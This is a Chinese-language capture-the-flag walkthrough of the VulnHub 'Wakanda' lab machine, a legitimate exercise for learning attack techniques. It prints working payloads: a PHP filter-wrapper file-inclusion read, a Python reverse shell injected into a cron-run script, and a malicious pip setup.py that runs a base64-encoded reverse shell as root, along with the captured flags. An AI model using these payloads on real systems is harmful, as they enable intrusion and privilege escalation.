vulnhub-wakanda

靶机ip192.168.56.101

nmap扫描

root@kali:~# nmap -sV -A 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-26 07:50 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.55% done
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.20% done; ETC: 07:51 (0:00:39 remaining)
Nmap scan report for 192.168.56.101
Host is up (0.32s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
80/tcp   open     http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp  open     rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          46692/tcp  status
|_  100024  1          55917/udp  status
514/tcp  filtered shell
3333/tcp open     ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
|   2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
|   256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
|_  256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (EdDSA)
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Linux 4.4 (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT     ADDRESS
1   3.82 ms 192.168.214.2
2   --      192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.53 seconds

开着80端口

打开主页，是一个很简单的php

在注释中发现?lang=fr

用dirbuster爆破发现存在fr.php

猜想可能是文件包含，直接填index会返回500

用php伪协议

?lang=php://filter/read=convert.base64-encode/resource=index

能得到源码的base64

解码得到

<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Vibranium market">
    <meta name="author" content="mamadou">

    <title>Vibranium Market</title>


    <link href="bootstrap.css" rel="stylesheet">


    <link href="cover.css" rel="stylesheet">
  </head>

  <body class="text-center">

    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
      <header class="masthead mb-auto">
        <div class="inner">
          <h3 class="masthead-brand">Vibranium Market</h3>
          <nav class="nav nav-masthead justify-content-center">
            <a class="nav-link active" href="#">Home</a>
            <!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
          </nav>
        </div>
      </header>

      <main role="main" class="inner cover">
        <h1 class="cover-heading">Coming soon</h1>
        <p class="lead">
          <?php
            if (isset($_GET['lang']))
          {
          echo $message;
          }
          else
          {
            ?>

            Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
            <?php
          }
?>
        </p>
        <p class="lead">
          <a href="#" class="btn btn-lg btn-secondary">Learn more</a>
        </p>
      </main>

      <footer class="mastfoot mt-auto">
        <div class="inner">
          <p>Made by<a href="#">@mamadou</a></p>
        </div>
      </footer>
    </div>





</body></html>

很明显地给出了一个密码，还有一个名字叫mamadou,想到开了ssh，可能是ssh的账号密码

ssh mamadou@192.168.56.101 -p 3333

成功登陆，但发现是一个python的终端

import pty
pty.spawn(“/bin/sh”)

转为shell

mamadou@Wakanda1:~$ cat flag1.txt

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

继续找flag2，发现在devops的家目录里，当前的用户无权限读取

find / -user devops 2>/dev/null

能发现/tmp/test和/srv/.antivirus.py文件

mamadou@Wakanda1:~$ ls -l /srv/.antivirus.py
-rw-r--rw- 1 devops developer 247 Sep 26 10:05 /srv/.antivirus.py

而这个py文件当前用户是可以写的

cat一下，发现是写test到tmp/test中

执行stat /tmp/test能发现test文件最近五分钟被修改过，所以这个py文件应该是被定时执行的

在py文件中写入反弹shell,提前开启另一个终端监听，过一会就能得到shell

open('/tmp/test','w').write('test')
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",7777))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

mamadou@Wakanda1:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 57176
/bin/sh: 0: can't access tty; job control turned off
$ whoami
devops
$ cd ~
$ ls
flag2.txt
$ cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)

$ sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip

执行sudo -l列出来能sudo的命令，发现pip

可以伪造安装包来弹shell https://github.com/0x00-0x00/FakePip

from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
  def run(self):
    install.run(self)
    RHOST = '127.0.0.1'  # change this

    reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 4433; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

改下host和端口,提前nc监听，然后执行sudo /usr/bin/pip install . --upgrade --force-reinstall，能得到root权限的shell

$ sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /home/devops/fakepip
  Running setup.py (path:/tmp/pip-4QVO0b-build/setup.py) egg_info for package from file:///home/devops/fakepip

Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip:
      Successfully uninstalled FakePip
  Running setup.py install for FakePip

mamadou@Wakanda1:~$ nc -lvnp 4433
listening on [any] 4433 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 52106
root@Wakanda1:/tmp/pip-4QVO0b-build# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Wakanda1:/tmp/pip-4QVO0b-build# cd ~
cd ~
root@Wakanda1:~# ls
ls
root.txt
root@Wakanda1:~# cat root.txt
cat root.txt
 _    _.--.____.--._
( )=.-":;:;:;;':;:;:;"-._
 \\\:;:;:;:;:;;:;::;:;:;:\
  \\\:;:;:;:;:;;:;:;:;:;:;\
   \\\:;::;:;:;:;:;::;:;:;:\
    \\\:;:;:;:;:;;:;::;:;:;:\
     \\\:;::;:;:;:;:;::;:;:;:\
      \\\;;:;:_:--:_:_:--:_;:;\
       \\\_.-"             "-._\
        \\
         \\
          \\
           \\ Wakanda 1 - by @xMagass
            \\
             \\


Congratulations You are Root!

821ae63dbe0c573eff8b69d451fb21bc

看着视频和wp才算做完的，不算难但也遇到了问题

• php文件包含漏洞
• python终端没有shell python -c ‘import pty; pty.spawn(“/bin/sh”)’
• 能修改的属于其他用户的文件
• sudo -l发现能用pip https://github.com/0x00-0x00/FakePip